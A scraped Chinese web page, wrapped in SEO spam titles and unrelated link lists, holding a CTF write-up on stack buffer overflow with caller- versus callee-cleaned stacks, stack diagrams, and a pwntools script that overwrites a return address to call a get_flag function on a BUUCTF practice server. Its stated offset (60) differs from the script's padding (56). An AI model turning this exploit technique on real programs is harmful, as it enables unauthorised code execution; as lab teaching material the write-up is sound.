当前位置: 首页 > wzjs >正文

淘宝返利网站建设百度seo营销网站

淘宝返利网站建设,百度seo营销网站,石家庄网站托管,自助建站系统源码下载栈溢出外平栈 1外平栈与内平栈的区别 外平栈: 栈帧的局部变量和返回地址之间没有额外的对齐或填充。返回地址直接位于局部变量的上方(即栈顶方向)。在计算偏移时,不需要额外加 4(因为返回地址紧邻局部变量&#xff09…

栈溢出+外平栈

1外平栈与内平栈的区别

  • 外平栈

    • 栈帧的局部变量和返回地址之间没有额外的对齐或填充。
    • 返回地址直接位于局部变量的上方(即栈顶方向)。
    • 在计算偏移时,不需要额外加 4(因为返回地址紧邻局部变量)。
  • 内平栈

    • 栈帧的局部变量和返回地址之间可能存在对齐或填充(例如,编译器为了对齐而插入的额外空间)。
    • 返回地址与局部变量之间有一定的距离。
    • 在计算偏移时,需要额外加 4(或其他值,具体取决于对齐方式)。

2. add esp, 3Ch; retn 的作用

  • add esp, 3Ch:释放栈上分配的 60 字节空间(3Ch = 60)。
  • retn:从栈顶弹出返回地址并跳转到该地址。

在漏洞利用中,这两条指令通常用于调整栈指针并返回到攻击者控制的地址。


3. 外平栈与内平栈的偏移计算

假设有以下栈布局:

外平栈布局:
+-----------------+
| 局部变量        |  <- esp + 0
+-----------------+
| 返回地址        |  <- esp + 60 (3Ch)
+-----------------+
  • 局部变量与返回地址之间没有额外空间。
  • 在计算偏移时,直接使用 offset = 60,不需要额外加 4。
内平栈布局:
+-----------------+
| 局部变量        |  <- esp + 0
+-----------------+
| 对齐填充        |  <- esp + 60 (3Ch)
+-----------------+
| 返回地址        |  <- esp + 64 (40h)
+-----------------+
  • 局部变量与返回地址之间有 4 字节的对齐填充。
  • 在计算偏移时,需要额外加 4,即 offset = 64

from pwn import *
io = remote("node5.buuoj.cn",28027)
payload = b'a'*56
# get_flag_addr:0x080489A0,exit_addr:0x0804E6A0
payload += p32(0x080489A0) + p32(0x0804E6A0) 
payload += p32(0x308CD64F) + p32(0x195719D1)
io.sendline(payload)
io.interactive()

http://www.dtcms.com/wzjs/798609.html

相关文章:

  • 影楼模板网站网站建设嘉兴
  • 做网站优化如何遍文章外包小程序开发技巧
  • wordpress怎么设置网站描述房地产最新消息2022
  • 做网站公证需要费用是多少o2o网站模版
  • 顺义建站好的公司wordpress网页手机版
  • 织梦后台怎么做导航栏的网站首页大型网站建设企业
  • 网站建设金网科技比wordpress好用的
  • 网站建设就业怎么样平顶山哪里有做网站的公司
  • 连云港商城网站开发设计seo运营招聘
  • html怎么弄成网站电子商务网站开发流程
  • 茂名市网站建设百度网站置顶怎么做
  • 关于继续做好网站建设得通知宿迁房产网二手房出售
  • 做网站的费用怎么录分录提供提供手机网站建设
  • 小语种网站怎么做小学生抄写新闻20字
  • 网站毕业设计怎么做网络营销计划的七个步骤
  • 廊坊哪里有做网站建设的工作正能量励志句子
  • 苏州的网站建设公司国际电商怎么做
  • 部队网站模板哪个网站可以看一级a做爰片t
  • 怎么建设一个人自己网站网站建设肆金手指排名4
  • 网站建设明细报价单古城网站建设
  • 网站 框架网页建设4399游戏网页版入口
  • 保定市做网站的公司关键词搜索广告
  • 网站建设最好的公司哪家好开发个app多少钱
  • 镇海网站建设莱州网络推广公司
  • 网站上的流动图片怎么做的长春建站企业
  • 福州网站建设的公司wordpress 数据库名贵
  • 2008iis网站建设电商设计平台
  • app网站建设开发国外做网站的公司
  • 网站关键字被改了商城源码开源
  • 一个网站的设计周期干洗店投资多少钱可以营业了